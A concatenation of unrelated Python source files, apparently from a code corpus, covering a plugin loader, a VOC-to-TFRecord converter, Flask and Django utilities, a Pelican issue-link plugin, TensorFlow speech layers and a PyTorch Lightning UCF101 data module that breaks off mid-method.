plugin_model = PluginRegistration.objects.get(name=plugin.get_full_name(),
version=plugin.version)
for extensible_cls in plugin.get_extensible_objects():
self._app.extensibles.register(plugin_model, extensible_cls)
def get_work_type(self, full_name):
# TODO: Validate that this is a work type class
if full_name not in self.work_types:
cls = InstanceManager.find_cls(full_name)
self.work_types[full_name] = cls
return self.work_types[full_name]
def get_extensible_types_from_db(self):
"""
:return: class objects of extensible types
"""
from clims.models.extensible import ExtensibleType
extensible_types = ExtensibleType.objects.all()
type_names_in_db = [e.name for e in extensible_types]
for type_name in type_names_in_db:
split_type_name = type_name.split('.')
full_module_name = '.'.join(split_type_name[:-1])
extensible_class_name = split_type_name[-1]
module = self._import_module(full_module_name)
extensible_class = getattr(module, extensible_class_name, None)
# NOTE: Silently returning nothing if the class wasn't loaded
if extensible_class:
yield extensible_class
else:
logger.warn("Not able to load registered extensible {}".format(type_name))
def find_plugins_by_entry_points(self):
"""
Returns plugins that have been marked as such by adding an entry like:
entry_points={
'clims.plugins': [
'org_plugins = org_plugins.plugins:YourPlugin',
],
},
to the setup.py file in the plugin package.
"""
# NOTE: Users must specify an entry_point in their setup.py so that plugins will
# be discovered.
# See e.g.: https://github.com/Molmed/commonlims-snpseq/blob/cd1c011a3/setup.py#L105
from pkg_resources import iter_entry_points
entry_points = [ep for ep in iter_entry_points('clims.plugins')]
for ep in entry_points:
try:
plugin = ep.load()
yield plugin
except Exception: # Handling all exceptions since the code is unknown to us.
import traceback
click.echo(
"Failed to load plugin %r:\n%s" % (ep.name, traceback.format_exc()),
err=True)
def find_all_plugins_in_scope(self):
"""
Yields all plugins that should be used, based on what can be found in the python environment.
"""
for plugin in self.find_plugins_by_entry_points():
yield plugin
# Load (runtime)
def load_installed(self):
"""
Loads all plugins that have been installed.
Takes the latest PluginRegistration found for each plugin and loads it. If the plugin
isn't installed anymore, or has a different version, an error is raised.
"""
logger.info("Loading all installed plugins")
from clims.models import PluginRegistration
try:
installed = list(PluginRegistration.objects.all())
except ProgrammingError:
# We might be loading the application before migrations have run, so the
# PluginRegistration type doesn't exist. In this case we silently pass and no plugins
# will be loaded
return
latest = dict()
for current in installed:
if current.name in latest \
and latest[current.name].sortable_version > current.sortable_version:
logger.debug("Found registration for {} but newer already found".format(current.name_and_version))
continue
logger.debug("Found a registration for {}".format(current.name_and_version))
latest[current.name] = current
for plugin_registration in latest.values():
self.load(plugin_registration)
self.handlers.validate()
logger.info("Active handlers after loading and validating all plugins:\n{}".format(
self.handlers.to_handler_config()))
def load(self, plugin_registration):
"""
Initializes the plugin class if it's found. It must match the name and version of the
PluginRegistration.
"""
# NOTE: We currently require plugins to load (the True flag). This is because plugins
# define types that must exist after they've been created. It might be worthy to find
# a way to deal with plugins that should not load anymore.
logger.info("Loading plugin '{}@{}'".format(
plugin_registration.name, plugin_registration.version))
try:
plugin = self.instance_manager.add(
plugin_registration.name, plugin_registration.version, True)
except self.instance_manager.ImportException:
# NOTE: We need to find a smooth way of getting rid of the plugin but still have
# an acceptably functioning system. For now however, this error is raised
# Allow the user to ignore the plugin if an environment variable is set. This
# is mainly for debug purposes and to be able to run `lims shell` in this situation.
if not os.environ.get("CLIMS_IGNORE_UNAVAILABLE_PLUGINS", None) == "1":
ex_type, ex_value, ex_tb = sys.exc_info()
six.reraise(RequiredPluginCannotLoad,
"Can't import required plugin {}@{}. The plugin has been installed e.g. via "
"`lims upgrade` but the implementation is not found in the python environment. "
"To override this check, you can set the "
"environment variable CLIMS_IGNORE_UNAVAILABLE_PLUGINS=1\n\t{}".format(
plugin_registration.name, plugin_registration.version, ex_value), ex_tb)
except self.instance_manager.InitializeException:
six.reraise(RequiredPluginCannotLoad,
"Can't initialize the plugin {}@{}. The stacktrace has more information on "
"why the plugin can not load.".format(
plugin_registration.name, plugin_registration.version))
# Registers handlers. Handlers can be defined in the submodule `handlers` or `workflows`
# directly below the plugin (TODO: Allow it to be defined anywhere)
for module_name in ["handlers", "workflows"]:
mod = self.get_plugin_module(plugin, module_name)
if not mod:
logger.info("No handlers module found in plugin '{}'".format(plugin))
else:
logger.info("Loading all handlers in plugin '{}'".format(plugin.get_name_and_version()))
self.handlers.load_handlers(mod)
def init_plugin_instance(plugin):
# TODO: Call this when the plugin is run on load time (review requirements first)
from sentry.plugins import bindings
plugin.setup(bindings)
# Register contexts from plugins if necessary
if hasattr(plugin, 'get_custom_contexts'):
from sentry.interfaces.contexts import contexttype
for cls in plugin.get_custom_contexts() or ():
contexttype(cls)
if (hasattr(plugin, 'get_cron_schedule') and plugin.is_enabled()):
schedules = plugin.get_cron_schedule()
if schedules:
settings.CELERYBEAT_SCHEDULE.update(schedules)
if (hasattr(plugin, 'get_worker_imports') and plugin.is_enabled()):
imports = plugin.get_worker_imports()
if imports:
settings.CELERY_IMPORTS += tuple(imports)
if (hasattr(plugin, 'get_worker_queues') and plugin.is_enabled()):
from kombu import Queue
for queue in plugin.get_worker_queues():
try:
name, routing_key = queue
except ValueError:
name = routing_key = queue
q = Queue(name, routing_key=routing_key)
q.durable = False
settings.CELERY_QUEUES.append(q)
# Query
def __iter__(self):
return iter(self.all())
def __len__(self):
return sum(1 for i in self.all())
def all(self, version=None, enabled=None):
"""
:param version: The version of the plugin interface. None will return all enabled plugins.
:param enabled: Specifies if only enabled plugins should be returned (True). If None, both
enabled and disbabled plugins are returned
:return: A generator that iterates over the plugins
"""
for plugin in sorted(self.instance_manager.all(), key=lambda x: x.get_title()):
if enabled is not None and not plugin.is_enabled():
continue
if version is not None and plugin.__version__ != version:
continue
yield plugin
def exists(self, slug):
for plugin in self.all(version=None):
if plugin.slug == slug:
return True
return False
def get(self, slug):
for plugin in self.all(version=None):
if plugin.slug == slug:
return plugin
raise KeyError(slug)
# Legacy
# These methods are pending deletion (from the sentry core)
def configurable_for_project(self, project, version=1):
for plugin in self.all(version=version):
if not safe_execute(plugin.can_configure_for_project,
project, _with_transaction=False):
continue
yield plugin
def for_project(self, project, version=1):
for plugin in self.all(version=version):
if not safe_execute(plugin.is_enabled, project, _with_transaction=False):
continue
yield plugin
def for_site(self, version=1):
for plugin in self.all(version=version):
if not plugin.has_site_conf():
continue
yield plugin
def get_registered_base_handler(self, cls):
"""
Returns True if cls is an implementation of a registered handler type
"""
for handler_type in self.handlers:
if issubclass(cls, handler_type):
return handler_type
return None
def get_plugin_module(self, plugin_class, name):
"""
Gets a module defined in the plugin. Returns None if it wasn't found
"""
full_module_name = '{}.{}'.format(plugin_class.__module__, name)
return self._import_module(full_module_name)
def _import_module(self, full_module_name):
split_name = full_module_name.split('.')
name = split_name[-1]
try:
return importlib.import_module(full_module_name)
except ImportError as ex:
if six.text_type(ex) != "No module named {}".format(name):
trace = sys.exc_info()[2]
raise ImportError("Error while trying to load plugin {}".format(full_module_name)), None, trace
logger.debug("Can't find module {}".format(full_module_name))
return None
def clear_handler_implementations(self, baseclass=None):
if baseclass is not None:
self.handlers[baseclass].clear()
else:
for key in self.handlers:
self.handlers[key].clear()
def unregister(self, cls):
self.remove('%s.%s' % (cls.__module__, cls.__name__))
return cls
class PluginMustHaveVersion(Exception):
pass
class PluginIncorrectVersionFormat(Exception):
pass
class RequiredPluginCannotLoad(Exception):
pass
| 16,444 | 4,312 |
import os
import random
import xml.etree.ElementTree as ET
import tensorflow as tf
def int64_feature(value):
"""Wrapper for inserting int64 features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def float_feature(value):
"""Wrapper for inserting float features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
DEFUALT_PATHS = {
'images': '/mnt/disk/chenyifeng/VOC2012/JPEGImages',
'annotations': '/mnt/disk/chenyifeng/VOC2012/Annotations',
'segmentations': '/mnt/disk/chenyifeng/VOC2012/SegmentationClassAug'
}
class PascalVocWriter:
"""
PASCAL VOC 2012 DataSet to TF record Writer
"""
def __init__(self, paths=DEFUALT_PATHS):
self.img_path = paths['images']
self.ano_path = paths['annotations']
self.sgm_path = paths['segmentations']
def convert_to_example(self, file_name):
img_path = os.path.join(self.img_path, file_name + '.jpg')
ano_path = os.path.join(self.ano_path, file_name + '.xml')
sgm_path = os.path.join(self.sgm_path, file_name + '.png')
img_data = tf.gfile.FastGFile(img_path, 'rb').read()
sgm_data = tf.gfile.FastGFile(sgm_path, 'rb').read()
# img_data = imread(img_path).tostring()
# sgm_data = imread(sgm_path).tostring()
anno_tree = ET.parse(ano_path)
anno_root = anno_tree.getroot()
# is_sgmt = int(anno_root.find('segmented').text)
# if is_sgmt == 0:
# print('{} is not a Segmentation Sample. So Skipped'.format(file_name))
size = anno_root.find('size')
shape = [int(size.find('height').text),
int(size.find('width').text),
int(size.find('depth').text)]
image_format = b'JPEG'
segment_format = b'PNG'
example = tf.train.Example(
features=tf.train.Features(
feature={
'image/name':bytes_feature(file_name.encode()),
'image/height': int64_feature(shape[0]),
'image/width': int64_feature(shape[1]),
'image/channels': int64_feature(shape[2]),
'image/shape': int64_feature(shape),
'image/format': bytes_feature(image_format),
'image/encoded': bytes_feature(img_data),
'label/format': bytes_feature(segment_format),
'label/encoded': bytes_feature(sgm_data)
}
)
)
return example
def add_to_record(self, file_name, tfrecord_writer):
example = self.convert_to_example(file_name)
tfrecord_writer.write(example.SerializeToString())
def run(self, pic_names, output_dir, shuffling=False, size=300):
if shuffling:
random.seed(1314)
random.shuffle(pic_names)
total_num = len(pic_names)
for start in range(0, total_num, size):
tf_filename = '%s/%03d.tfrecord' % (output_dir, start // size)
tf_recorder = tf.python_io.TFRecordWriter(tf_filename)
print('=>' * (start * 5 // total_num) + '{:.0f}% Finished'.format(start / total_num * 100))
for pic_idx in range(start, min(start + 300, total_num)):
pic_name = pic_names[pic_idx]
self.add_to_record(pic_name, tf_recorder)
print('=>' * 5 + '{:.0f}% Finished'.format(100))
def convert_val():
writer = PascalVocWriter()
pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/val.txt').readlines()
pic_names = [i.strip(' \n') for i in pic_names]
writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/val')
def convert_train():
writer = PascalVocWriter()
pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/train.txt').readlines()
pic_names = [i.strip(' \n') for i in pic_names]
writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/train')
if __name__ == '__main__':
# convert_train()
convert_val()
| 4,522 | 1,548 |
import click
from flask.cli import with_appcontext
from backend.models import JWTToken
@click.command()
@with_appcontext
def remove_expired_tokens():
"""Remove expired tokens from database."""
click.echo("Removing expired tokens")
JWTToken.remove_expired()
click.echo("Done!")
| 296 | 91 |
from nextsong import Playlist as p
p(
"01.mp3",
p(
p("02.mp3", weight=1 / 4),
p(weight=3 / 4),
count=1,
),
"03.mp3",
"04.mp3",
loop=True,
).save_xml()
| 200 | 94 |
import itertools
import re
from pelican import signals
ISSUE_REGEX = re.compile(r"([\s(])(#[\d]+)([\s),.])")
ISSUE_URL = "https://github.com/GlowstoneMC/Glowstone/issues/{}"
ISSUE_HTML = """{}<a href="{}">{}</a>{}"""
def process_content(article):
done_tags = set()
for start, tag, end in ISSUE_REGEX.findall(article._content):
if tag in done_tags:
continue
done_tags.add(tag)
num = tag[1:]
article._content = article._content.replace(
"{}{}{}".format(start, tag, end),
ISSUE_HTML.format(start, ISSUE_URL.format(num), tag, end),
)
def get_issue_links(generator):
blog = itertools.chain(generator.articles, generator.drafts)
for article in blog:
process_content(article)
def register():
signals.article_generator_finalized.connect(get_issue_links)
| 861 | 298 |
# coding=utf-8
# Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=too-few-public-methods, invalid-name
# pylint: disable=no-self-use, missing-function-docstring
"""Utils for common layers."""
import tensorflow as tf
from athena.layers.functional import make_positional_encoding, collapse4d, gelu
from athena.layers.functional import splice
from athena.utils.misc import gated_linear_layer
class PositionalEncoding(tf.keras.layers.Layer):
"""positional encoding can be used in transformer"""
def __init__(self, d_model, max_position=800, scale=False):
super().__init__()
self.d_model = d_model
self.scale = scale
self.pos_encoding = make_positional_encoding(max_position, d_model)
def call(self, x):
""" call function """
seq_len = tf.shape(x)[1]
if self.scale:
x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))
x += self.pos_encoding[:, :seq_len, :]
return x
class ScaledPositionalEncoding(PositionalEncoding):
"""scaled positional encoding,
reference: https://arxiv.org/pdf/1809.08895.pdf"""
def __init__(self, d_model, max_position=800):
super().__init__(d_model, max_position, scale=False)
def build(self, _):
self.alpha = self.add_weight(
name="alpha", initializer=tf.keras.initializers.constant(1)
)
def call(self, x):
seq_len = tf.shape(x)[1]
x += self.alpha * self.pos_encoding[:, :seq_len, :]
return x
class Collapse4D(tf.keras.layers.Layer):
"""collapse4d can be used in cnn-lstm for speech processing
reshape from [N T D C] -> [N T D*C]
"""
def call(self, x):
return collapse4d(x)
class Gelu(tf.keras.layers.Layer):
"""Gaussian Error Linear Unit.
This is a smoother version of the RELU. Original paper: https://arxiv.org/abs/1606.08415
Args:
x: float Tensor to perform activation.
Returns:
x: with the GELU activation applied.
"""
def call(self, x):
return gelu(x)
class TdnnLayer(tf.keras.layers.Layer):
"""An implementation of Tdnn Layer
Args:
context: a int of left and right context, or a list of context indexes, e.g. (-2, 0, 2).
output_dim: the dim of the linear transform
"""
def __init__(self, context, output_dim, use_bias=False, **kwargs):
super().__init__(**kwargs)
if hasattr(context, "__iter__"):
self.context_size = len(context)
self.context_list = context
else:
self.context_size = context * 2 + 1
self.context_list = range(-context, context + 1)
self.output_dim = output_dim
self.linear = tf.keras.layers.Dense(output_dim, use_bias=use_bias)
def call(self, x, training=None, mask=None):
x = splice(x, self.context_list)
x = self.linear(x, training=training, mask=mask)
return x
class GroupNormalization(tf.keras.layers.Layer):
def __init__(
self,
groups: int = 2,
axis: int = -1,
epsilon: float = 1e-3,
center: bool = True,
scale: bool = True,
beta_initializer = "zeros",
gamma_initializer = "ones",
beta_regularizer = None,
gamma_regularizer = None,
beta_constraint = None,
gamma_constraint = None,
**kwargs
):
super().__init__(**kwargs)
self.supports_masking = True
self.groups = groups
self.axis = axis
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = tf.keras.initializers.get(beta_initializer)
self.gamma_initializer = tf.keras.initializers.get(gamma_initializer)
self.beta_regularizer = tf.keras.regularizers.get(beta_regularizer)
self.gamma_regularizer = tf.keras.regularizers.get(gamma_regularizer)
self.beta_constraint = tf.keras.constraints.get(beta_constraint)
self.gamma_constraint = tf.keras.constraints.get(gamma_constraint)
self._check_axis()
def build(self, input_shape):
self._check_if_input_shape_is_none(input_shape)
self._set_number_of_groups_for_instance_norm(input_shape)
self._check_size_of_dimensions(input_shape)
self._create_input_spec(input_shape)
self._add_gamma_weight(input_shape)
self._add_beta_weight(input_shape)
self.built = True
super().build(input_shape)
def call(self, inputs):
input_shape = tf.keras.backend.int_shape(inputs)
tensor_input_shape = tf.shape(inputs)
reshaped_inputs, group_shape = self._reshape_into_groups(
inputs, input_shape, tensor_input_shape
)
normalized_inputs = self._apply_normalization(reshaped_inputs, input_shape)
outputs = tf.reshape(normalized_inputs, tensor_input_shape)
return outputs
def get_config(self):
config = {
"groups": self.groups,
"axis": self.axis,
"epsilon": self.epsilon,
"center": self.center,
"scale": self.scale,
"beta_initializer": tf.keras.initializers.serialize(self.beta_initializer),
"gamma_initializer": tf.keras.initializers.serialize(
self.gamma_initializer
),
"beta_regularizer": tf.keras.regularizers.serialize(self.beta_regularizer),
"gamma_regularizer": tf.keras.regularizers.serialize(
self.gamma_regularizer
),
"beta_constraint": tf.keras.constraints.serialize(self.beta_constraint),
"gamma_constraint": tf.keras.constraints.serialize(self.gamma_constraint),
}
base_config = super().get_config()
return {**base_config, **config}
def compute_output_shape(self, input_shape):
return input_shape
def _reshape_into_groups(self, inputs, input_shape, tensor_input_shape):
group_shape = [tensor_input_shape[i] for i in range(len(input_shape))]
group_shape[self.axis] = input_shape[self.axis] // self.groups
group_shape.insert(self.axis, self.groups)
group_shape = tf.stack(group_shape)
reshaped_inputs = tf.reshape(inputs, group_shape)
return reshaped_inputs, group_shape
def _apply_normalization(self, reshaped_inputs, input_shape):
group_shape = tf.keras.backend.int_shape(reshaped_inputs)
group_reduction_axes = list(range(1, len(group_shape)))
axis = -2 if self.axis == -1 else self.axis - 1
group_reduction_axes.pop(axis)
mean, variance = tf.nn.moments(
reshaped_inputs, group_reduction_axes, keepdims=True
)
gamma, beta = self._get_reshaped_weights(input_shape)
normalized_inputs = tf.nn.batch_normalization(
reshaped_inputs,
mean=mean,
variance=variance,
scale=gamma,
offset=beta,
variance_epsilon=self.epsilon,
)
return normalized_inputs
def _get_reshaped_weights(self, input_shape):
broadcast_shape = self._create_broadcast_shape(input_shape)
gamma = None
beta = None
if self.scale:
gamma = tf.reshape(self.gamma, broadcast_shape)
if self.center:
beta = tf.reshape(self.beta, broadcast_shape)
return gamma, beta
def _check_if_input_shape_is_none(self, input_shape):
dim = input_shape[self.axis]
if dim is None:
raise ValueError(
"Axis " + str(self.axis) + " of "
"input tensor should have a defined dimension "
"but the layer received an input with shape " + str(input_shape) + "."
)
def _set_number_of_groups_for_instance_norm(self, input_shape):
dim = input_shape[self.axis]
if self.groups == -1:
self.groups = dim
def _check_size_of_dimensions(self, input_shape):
dim = input_shape[self.axis]
if dim < self.groups:
raise ValueError(
"Number of groups (" + str(self.groups) + ") cannot be "
"more than the number of channels (" + str(dim) + ")."
)
if dim % self.groups != 0:
raise ValueError(
"Number of groups (" + str(self.groups) + ") must be a "
"multiple of the number of channels (" + str(dim) + ")."
)
def _check_axis(self):
if self.axis == 0:
raise ValueError(
"You are trying to normalize your batch axis. Do you want to "
"use tf.layer.batch_normalization instead"
)
def _create_input_spec(self, input_shape):
dim = input_shape[self.axis]
self.input_spec = tf.keras.layers.InputSpec(
ndim=len(input_shape), axes={self.axis: dim}
)
def _add_gamma_weight(self, input_shape):
dim = input_shape[self.axis]
shape = (dim,)
if self.scale:
self.gamma = self.add_weight(
shape=shape,
name="gamma",
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint,
)
else:
self.gamma = None
def _add_beta_weight(self, input_shape):
dim = input_shape[self.axis]
shape = (dim,)
if self.center:
self.beta = self.add_weight(
shape=shape,
name="beta",
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint,
)
else:
self.beta = None
def _create_broadcast_shape(self, input_shape):
broadcast_shape = [1] * len(input_shape)
broadcast_shape[self.axis] = input_shape[self.axis] // self.groups
broadcast_shape.insert(self.axis, self.groups)
return broadcast_shape
class InstanceNormalization(GroupNormalization):
"""Instance normalization layer.
References
- [Instance Normalization: The Missing Ingredient for Fast Stylization]
(https://arxiv.org/abs/1607.08022)
"""
def __init__(self, **kwargs):
kwargs["groups"] = -1
super().__init__(**kwargs)
class DownSampleBlock(tf.keras.layers.Layer):
"""conv2d downsample block for stargan, instance norm is used because batch size is 1
"""
def __init__(self, filters, kernel_size, strides):
super(DownSampleBlock, self).__init__()
self.conv1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=strides,
padding="same")
self.conv2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=strides,
padding="same")
self.norm1 = InstanceNormalization(epsilon=1e-8)
self.norm2 = InstanceNormalization(epsilon=1e-8)
def call(self, x):
h1 = self.conv1(x)
h1_norm = self.norm1(h1)
h1_gates = self.conv2(x)
h1_gates_norm = self.norm2(h1_gates)
h1_glu = gated_linear_layer(inputs=h1_norm, gates=h1_gates_norm)
return h1_glu
class UpSampleBlock(tf.keras.layers.Layer):
"""conv2d upsample block for stargan, instance norm is used because batch size is 1
"""
def __init__(self, filters, kernel_size, strides):
super(UpSampleBlock, self).__init__()
self.conv1 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=strides,
padding="same")
self.conv2 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=strides,
padding="same")
self.norm1 = InstanceNormalization(epsilon=1e-8)
self.norm2 = InstanceNormalization(epsilon=1e-8)
def call(self, x):
h1 = self.conv1(x)
h1_norm = self.norm1(h1)
h1_gates = self.conv2(x)
h1_gates_norm = self.norm2(h1_gates)
h1_glu = gated_linear_layer(inputs=h1_norm, gates=h1_gates_norm)
return h1_glu
class ConditionalInstanceNormalisation(tf.keras.layers.Layer):
"""CIN Block."""
def __init__(self, in_channel):
super(ConditionalInstanceNormalisation, self).__init__()
self.dim_in = in_channel
self.gamma = tf.keras.layers.Dense(in_channel)
self.beta = tf.keras.layers.Dense(in_channel)
def call(self, x, c):
u = tf.math.reduce_mean(x, axis=1, keepdims=True)
var = tf.math.reduce_mean((x - u) * (x - u), axis=1, keepdims=True)
std = tf.math.sqrt(var + 1e-8)
gamma = self.gamma(c)
gamma = tf.reshape(gamma, [-1, 1, self.dim_in])
beta = self.beta(c)
beta = tf.reshape(beta, [-1, 1, self.dim_in])
h = (x - u) / std
h = h * gamma + beta
return h
class ResidualBlock(tf.keras.layers.Layer):
"""Residual Block with instance normalization."""
def __init__(self, out_channel):
super(ResidualBlock, self).__init__()
self.conv_1 = tf.keras.layers.Conv1D(filters=out_channel, kernel_size=3, strides=1, padding="same", use_bias=False)
self.cin_1 = ConditionalInstanceNormalisation(out_channel)
def call(self, x, c):
x = self.conv_1(x)
x = self.cin_1(x, c)
x = gated_linear_layer(inputs=x, gates=x)
return x
class Down2d_init(tf.keras.layers.Layer):
def __init__(self, filters , kernel_size, stride):
super(Down2d_init, self).__init__()
self.c1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=stride, padding="same")
def call(self, x):
x1 = self.c1(x)
x1 = gated_linear_layer(inputs=x1, gates=x1)
return x1
class Down2d(tf.keras.layers.Layer):
def __init__(self, filters , kernel_size, stride):
super(Down2d, self).__init__()
self.c1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=stride, padding="same")
self.norm1 = InstanceNormalization(epsilon=1e-8)
def call(self, x):
x1 = self.c1(x)
x1 = self.norm1(x1)
x1 = gated_linear_layer(inputs=x1, gates=x1)
return x1
class Up2d(tf.keras.layers.Layer):
"""docstring for Up2d."""
def __init__(self, filters, kernel_size, stride):
super(Up2d, self).__init__()
self.c1 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=stride, padding="same")
self.norm1 = InstanceNormalization(epsilon=1e-8)
def call(self, x):
x1 = self.c1(x)
x1 = self.norm1(x1)
x1 = gated_linear_layer(inputs=x1, gates=x1)
return x1
class ZoneOutCell(tf.keras.layers.LSTMCell):
"""Wrapper for LSTM cell to create ZoneOut Cell
inspired by:
https://github.com/teganmaharaj/zoneout/blob/master/zoneout_tensorflow.py
Published by one of 'https://arxiv.org/pdf/1606.01305.pdf' paper writers.
"""
def __init__(self, zoneout_rate=0., **kwargs):
super().__init__(**kwargs)
self.zoneout_rate = zoneout_rate
self.drop_layer = tf.keras.layers.Dropout(self.zoneout_rate)
def call(self, inputs, states, training=False):
"""Runs vanilla LSTM Cell and applies zoneout.
"""
# Apply vanilla LSTM
outputs, new_states = super().call(inputs, states, training=training)
if self.zoneout_rate == 0:
return outputs, new_states
# Apply zoneout
h = (1 - self.zoneout_rate) * \
self.drop_layer(new_states[0] - states[0], training=training) + \
states[0]
c = (1 - self.zoneout_rate) * \
self.drop_layer(new_states[1] - states[1], training=training) + \
states[1]
return outputs, [h, c]
def get_config(self):
config = super().get_config()
config['zoneout_rate'] = self.zoneout_rate
return config
SUPPORTED_RNNS = {
"lstm": tf.keras.layers.LSTMCell,
"gru": tf.keras.layers.GRUCell,
"cudnnlstm": tf.keras.layers.LSTMCell,
"cudnngru": tf.keras.layers.GRUCell
}
ACTIVATIONS = {
"relu": tf.nn.relu,
"relu6": tf.nn.relu6,
"elu": tf.nn.elu,
"selu": tf.nn.selu,
"gelu": gelu,
"leaky_relu": tf.nn.leaky_relu,
"sigmoid": tf.nn.sigmoid,
"softplus": tf.nn.softplus,
"softsign": tf.nn.softsign,
"tanh": tf.nn.tanh,
}
| 17,295 | 5,641 |
# Generated by Django 2.1 on 2018-08-30 15:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tickets', '0011_auto_20180830_0828'),
]
operations = [
migrations.AlterField(
model_name='ticket',
name='dttm_updated',
field=models.DateTimeField(),
),
]
| 381 | 139 |
#
# Copyright (C) 2020 Intel Corporation
#
# SPDX-License-Identifier: BSD-3-Clause
#
import logging
from collections import Counter
import torch
from torch.utils.data import DataLoader
from torchvision.transforms import transforms as T
from torchvision.transforms import functional as TF
import pytorch_lightning as pl
from sklearn.model_selection import StratifiedShuffleSplit
from oscar.data.ucf101 import UCF101Dataset
from oscar.data.video import ClipSampler, MiddleClipSampler
from oscar.data.transforms import ExCompose, Permute, Squeeze, Unsqueeze, ExSplitLambda
from MARS.dataset.preprocess_data import get_mean
logger = logging.getLogger(__name__)
class MARSDataModule(pl.LightningDataModule):
def __init__(
self,
modality,
frames_root,
annotation_dir,
fold=1,
batch_size=16,
num_workers=1,
frame_size=112,
clip_length=16,
clip_step=1,
mid_clip_only=False,
random_resized_crop_scale=(0.5, 1.0),
test_indices=None,
test_size=0,
random_seed=0,
collate_fn=None,
frame_cache_dir=None,
train_file_patterns=["{:05d}.jpg", "TVL1jpg_x_{:05d}.jpg", "TVL1jpg_y_{:05d}.jpg"],
test_file_patterns=["{:05d}.jpg"],
):
super().__init__()
assert modality in ['RGB', 'RGB_Flow',
'RGBMasked_Flow', 'RGBMasked_FlowMasked',
'RGBSeg_Flow',
'RGBSegMC_Flow',
'RGBSegSC_Flow', 'RGBKeySC_Flow']
self.modality = modality
self.frames_root = frames_root
self.annotation_dir = annotation_dir
self.fold = fold
self.batch_size = batch_size
self.num_workers = num_workers
self.frame_size = frame_size
self.clip_length = clip_length
self.clip_step = clip_step
self.mid_clip_only = mid_clip_only
self.random_resized_crop_scale = random_resized_crop_scale
self.test_indices = test_indices
self.test_size = test_size
self.random_seed = random_seed
self.collate_fn = collate_fn
self.frame_cache_dir = frame_cache_dir
self.train_file_patterns = train_file_patterns
self.test_file_patterns = test_file_patterns
from detectron2.data import MetadataCatalog
self.palette = MetadataCatalog.get('coco_2017_val').thing_colors
if 'RGBSegMC_' in self.modality:
self.input_channels = len(self.palette) + 2 # COCO-things + XY
elif 'RGBSegSC_' in self.modality or 'RGBKeySC_' in self.modality:
self.input_channels = 1 + 2 # Mask + XY
else:
self.input_channels = 3 + 2 # RGB + XY
@classmethod
def add_argparse_args(cls, parser):
group = parser.add_argument_group(cls.__name__)
group.add_argument('--modality', default='RGB', type=str, choices=['RGB', 'RGB_Flow', 'RGBMasked_Flow', 'RGBMasked_FlowMasked', 'RGBSeg_Flow', 'RGBSegMC_Flow', 'RGBSegSC_Flow', 'RGBKeySC_Flow'])
group.add_argument('--dataset', default='UCF101', type=str, choices=['UCF101'])
group.add_argument('--only_RGB', default=False, action='store_true')
group.add_argument('--batch_size', default=32, type=int)
group.add_argument('--frame_dir', default=None, type=str)
group.add_argument('--annotation_path', default=None, type=str)
group.add_argument('--frame_mask_dir', default=None, type=str)
group.add_argument('--n_workers', default=4, type=int)
group.add_argument('--split', default=1, type=int, choices=[1, 2, 3])
group.add_argument('--sample_size', default=112, type=int)
group.add_argument('--sample_duration', default=16, type=int)
group.add_argument('--step_between_clips', default=1, type=int)
group.add_argument('--random_resized_crop_scale_min', default=0.5, type=float)
group.add_argument('--random_resized_crop_scale_max', default=1.0, type=float)
group.add_argument('--test_size', default=0, type=int)
group.add_argument('--test_index', default=None, type=int, nargs='+')
group.add_argument('--random_seed', default=1, type=bool, help='Manually set random seed of sampling validation clip')
group.add_argument('--mid_clip_only', default=False, type=bool)
group.add_argument('--shuffle_axes', default=None, type=int, nargs='+')
return parser
def prepare_data(self):
UCF101Dataset(self.frames_root,
self.annotation_dir,
self.train_file_patterns,
fold=self.fold)
def setup(self, stage=None):
logger.info("Setting up data module for stage: %s", stage)
channels_mean = torch.tensor([*get_mean('activitynet'), 127.5, 127.5])
train_channels_mean = channels_mean
test_channels_mean = channels_mean[0:3]
# Create robust feature transform
robust_extractor = None
if 'RGBMasked_' in self.modality:
from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor
from oscar.defences.preprocessor.ablator import AblatorPyTorch
dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir)
robust_extractor = AblatorPyTorch(channels_mean / 255, detectron2=dt2)
elif 'RGBSeg_' in self.modality:
from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor
from oscar.defences.preprocessor.paletted_semantic_segmentor import PalettedSemanticSegmentorPyTorch
dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir)
robust_extractor = PalettedSemanticSegmentorPyTorch(channels_mean[0:3] / 255, detectron2=dt2, palette=self.palette)
elif 'RGBSegMC_' in self.modality:
from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor
